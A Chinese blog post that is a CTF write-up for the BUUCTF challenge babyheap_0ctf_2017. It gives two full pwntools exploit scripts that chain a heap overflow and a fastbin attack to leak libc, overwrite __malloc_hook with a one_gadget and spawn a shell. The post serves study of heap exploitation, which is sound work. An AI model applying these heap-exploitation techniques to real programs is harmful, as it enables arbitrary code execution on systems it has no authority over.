babyheap_0ctf_2017

最新推荐文章于 2024-01-10 03:24:25 发布
最新推荐文章于 2024-01-10 03:24:25 发布
阅读量333 收藏
点赞数
分类专栏: Buuctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44864859/article/details/107883565
版权

考察的主要是是堆溢出和fastbin attack。通过这道题巩固了一下基础的堆利用,另外看了其他师傅的wp后发现了新的泄漏libc的方法。嗯。。。严格来说也不能算是新的方法,其本质上是一样的,主要是在构造上有一定的区别。

​ 先贴一下我的exp:

from pwn import  *
from LibcSearcher import LibcSearcher
from sys import argv

def ret2libc(leak, func, path=''):
	if path == '':
		libc = LibcSearcher(func, leak)
		base = leak - libc.dump(func)
		system = base + libc.dump('system')
		binsh = base + libc.dump('str_bin_sh')
	else:
		libc = ELF(path)
		base = leak - libc.sym[func]
		system = base + libc.sym['system']
		binsh = base + libc.search('/bin/sh').next()

	return (system, binsh)

s       = lambda data               :p.send(str(data))
sa      = lambda delim,data         :p.sendafter(str(delim), str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda delim,data         :p.sendlineafter(str(delim), str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
itr     = lambda                    :p.interactive()
uu32    = lambda data               :u32(data.ljust(4,'\0'))
uu64    = lambda data               :u64(data.ljust(8,'\0'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))

context.log_level = 'DEBUG'
binary = './babyheap_0ctf_2017'
context.binary = binary
elf = ELF(binary,checksec=False)


def dbg():
	gdb.attach(p)
	pause()

def alloc(size):
    p.recvuntil("Command: ")
    p.sendline("1")
    p.recvuntil("Size: ")
    p.sendline(str(size))
 
def fill(idx, content):
    p.recvuntil("Command: ")
    p.sendline("2")
    p.recvuntil("Index: ")
    p.sendline(str(idx))
    p.recvuntil("Size: ")
    p.sendline(str(len(content)))
    p.recvuntil("Content: ")
    p.send(content)
 
def free(idx):
    p.recvuntil("Command: ")
    p.sendline("3")
    p.recvuntil("Index: ")
    p.sendline(str(idx))
 
def dump(idx):
    p.recvuntil("Command: ")
    p.sendline("4")
    p.recvuntil("Index: ")
    p.sendline(str(idx))
    p.recvline()
    return p.recvline()

def pwn(ip,port,debug):
	global p
	global libc
	if(debug == 1):
		p = process(binary)
		libc = ELF("/home/parallels/Desktop/2.23-0ubuntu11.2_amd64/libc-2.23.so")
	else:
		p = remote(ip,port)
		libc = ELF("/home/parallels/Desktop/libc/libc-2.23.so")

	alloc(0x18) # 0 
	alloc(0x68) # 1 
	alloc(0x68) # 2
	alloc(0x18) # 3 
	fill(0,'a'*0x18+'\xe1') 
	free(1)
	alloc(0x68) # 1 
	base = u64(dump(2)[:6].ljust(8, "\x00"))-88-libc.sym['__malloc_hook']-0x10
	leak('base',base)
	malloc_hook = base+libc.sym['__malloc_hook']
	leak("__malloc_hook",libc.sym['__malloc_hook'])
	alloc(0x60) # 4 <-> 2
	free(3)
	free(2)
	fill(4,p64(malloc_hook-0x23)+'\n')
	alloc(0x60)
	alloc(0x60)
	fill(3,flat('a'*19,base+0x4526a))
	alloc(0x18)
	itr()

if __name__ == "__main__":
	pwn("node3.buuoj.cn",26394,0)

​ 再来看一下其他师傅的exp

#!/usr/bin/env python
 
from pwn import *
import sys
 
context.log_level = "debug"
 
elf = "./babyheap_0ctf_2017"
 
p = process(elf)


def dbg():
	gdb.attach(p)
	pause()

def alloc(size):
    p.recvuntil("Command: ")
    p.sendline("1")
    p.recvuntil("Size: ")
    p.sendline(str(size))
 
def fill(idx, content):
    p.recvuntil("Command: ")
    p.sendline("2")
    p.recvuntil("Index: ")
    p.sendline(str(idx))
    p.recvuntil("Size: ")
    p.sendline(str(len(content)))
    p.recvuntil("Content: ")
    p.send(content)
 
def free(idx):
    p.recvuntil("Command: ")
    p.sendline("3")
    p.recvuntil("Index: ")
    p.sendline(str(idx))
 
def dump(idx):
    p.recvuntil("Command: ")
    p.sendline("4")
    p.recvuntil("Index: ")
    p.sendline(str(idx))
    p.recvline()
    return p.recvline()
 
 
alloc(0x10) #0
alloc(0x10) #1
alloc(0x10) #2
alloc(0x10) #3
alloc(0x80) #4
 
free(1)
free(2)
 
payload = p64(0)*3
payload += p64(0x21)
payload += p64(0)*3
payload += p64(0x21)
payload += p8(0x80)
fill(0, payload) #通过溢出修改chunk2中的fd指针最低位改成0x80,这样chunk2就指向了chunk4
 
payload = p64(0)*3
payload += p64(0x21)
fill(3, payload) #通过溢出修改chunk4的size为0x21,为了绕过fastbin检查
 
alloc(0x10) #1
alloc(0x10) #2 指向的是chunk4
 
payload = p64(0)*3
payload += p64(0x91)
fill(3, payload)
alloc(0x80) #5
free(4) 
 
libc_base = u64(dump(2)[:8].strip().ljust(8, "\x00"))-0x3c4b78 #通过chunk2泄漏
log.info("libc_base: "+hex(libc_base))
 
alloc(0x60) #4 对原来的chunk4进行切割,以便于接下伪造fake chunk
free(4)
 
payload = p64(libc_base+0x3c4aed)
fill(2, payload)
 
alloc(0x60) #4
alloc(0x60) #fake chunk
 
payload = p8(0)*3
payload += p64(0)*2
payload += p64(libc_base+0x4527a)
fill(6, payload) #修改malloc_hook为one gadget
 
alloc(255)
 
p.interactive()
棂星
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
babyheap_0_ctf_2017
m0_48127441的博客
04-01 199
漏洞就是劫持程序控制流 先对程序进行分析 alloc(Length) //struct a_malloc{int use_or_not; int Length;void*base;int un_use} ; struct a_malloc malloc_array[16]; fill(任意长度) free(指定块) dump(输出对应chunk的Length)//可以填充任意长度的数据,即可以修改 chunk头 目标 -->劫持程序控制流 --> 把__malloc_hoo...
0ctf_2017_babyheap详解
像初雪一样自由洒落
04-19 3816
本文主要列出0ctf_2017_babyheap的详细过程 主要参考:https://bbs.pediy.com/thread-223461.htm 程序流程 allocate:申请size大小的块 fill:对idx的块,设置size,并填入content free:释放idx的块 dump:打印idx的块内容 漏洞分析 fill中的size可以重新设置,故可以造成堆溢出。 方法:fastbin attack double free泄露libc 【small/large chunk释放,fd和.
babyheap_0ctf_2017 详细解析【BUUCTF】
qq_41696518的博客
09-06 2823
好家伙,保护全开,根据文件名,可以判断这是一道堆题目,刷了这么久,终于遇到堆题目了,解析就写的详细点。先看main函数,很简单就是各类个目录函数,一步一步来看把。
[BUUCTF] babyheap_0ctf_2017
红叶的博客
03-28 808
有点回想起当初第一次拿到flag时的感觉,继续加油。 本题考察知识点:**Fastbin Attack** 与 **Unsorted Bin Attack。** 通过使用Fastbin Attack与堆溢出漏洞,我们可以绕过Free后指针置零,从而达到在置零指针后获取堆块fd指针。 通过Unsorted Bin Attack,我们可以泄露Libc地址。 然后我们再使用Fastbin Attack替换__malloc_hook 本文写给自己,也写给跟我一样全网寻找详细解答的师傅们。
babyheap_0ctf_2017 详解
Bi0x的博客
11-24 1628
题目地址: https://buuoj.cn/challenges#babyheap_0ctf_2017 本题为 64 位,以下内容以64位为例 信息收集 弄到题目文件先 checksec 保护全开,那必然就要想办法泄漏出 libc 基地址的偏移量来实现调用其他函数 先逆向一下文件,对于 main 函数大概的构造情况如下 对于 allocate 函数,里面用户输入 size 后根据其大小进行内存分配 这里使用了 calloc函数,其与malloc不同的是分配内存后会把数据.
我又pwn啦——*刷题篇 babyheap_0ctf_2017
m0_64195960的博客
07-28 630
babyheap
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
welcome_CTF.exe
08-07
一道简单的ctf逆向题目,取自于成信大2019四叶草安全杯比赛
CTF神器_ctf
09-23
【标题】:“CTF神器_ctf” 在网络安全领域,CTF(Capture The Flag)是一种流行的竞赛形式,参与者通过解决各种安全挑战来展示他们的技能。在这个压缩包“CTF神器_ctf”中,重点可能指向了一个名为“dirsearch”的...
ctf脚本_ctfpy脚本_ctf跑脚本_ctf_ctf脚本密码_
09-30
ctf 密码学 脚本 合集 非常 nice
test_ctf_
09-30
【标题】"test_ctf_" 是一个与网络安全领域中的 Capture The Flag(CTF)比赛相关的学习资源,可能是一个练习项目或者教程。在CTF比赛中,参赛者通常需要展示他们在网络安全、编程、逆向工程、密码学等多个领域的...
0ctf Babyheap 2017
Bill
03-11 6407
0ctf 2017 BabyHeap 1. 题目分析 Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 如果RELRO: Partial RELRO, 有可能是格式化字符串。 结论...
[BUUCTF]-PWN:babyheap_0ctf_2017解析
2301_79326813的博客
01-10 984
但是这里要解释一点,为什么不能直接释放堆块4,虽然这样堆块4也能进入unsortedbin里,但是要注意free堆块后指向堆块的指针将会被置零,大致意思就是free了之后,index4就不指向那个堆块了,这时候dump(4)就是无效的,虽然那个堆块里面有mainarena+88的地址,但dump(4)不会打印出里面的地址,所以我们要让两个堆块的指针指向同一个堆块,这样在释放掉一个堆块时还能用另一个指针利用该堆块。后面alloc(0x60)与这里的0x7f有关。
【BUUCTF - PWN】babyheap_0ctf_2017
古月浪子的博客
04-05 2633
checksec一下,堆题果然是保护全开 IDA打开看看,首先mmap一块随机区域,用于存放我们申请的块的属性,然后输出菜单,有allocate、fill、free、dump功能 可以注意到,在创建堆的时候,将堆的地址和大小存放在了mmap的区域中,并且使用的是calloc,会将申请的内存区域清零 漏洞点在fill函数中,没有限制输入内容的长度,从而可以堆溢出 删除堆后会将指针置零 输出...
0CTF-babyheap2017祥讲
Jc
07-26 456
解题思路 1. 查看文件信息,安全机制 2. IDA审计 3. 分析漏洞点 4. 编写EXP 1.基本信息 安全机制 安全机制全部开启了,其实不用慌,对我们做题影响不是很大 运行 ## IDA ...
RubyRuby语言的基础教程和一些案例.md
最新发布
08-01
【Ruby】Ruby语言的基础教程和一些案例
x_ctf_b0verfl0w
10-22
x_ctf_b0verfl0w是一道栈溢出的题目,需要利用栈溢出漏洞来实现攻击。攻击者需要构造一个ROP链,通过泄露puts函数的地址,计算出libc的基地址,然后再通过libc中的system函数和/bin/sh字符串的地址来执行系统命令。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值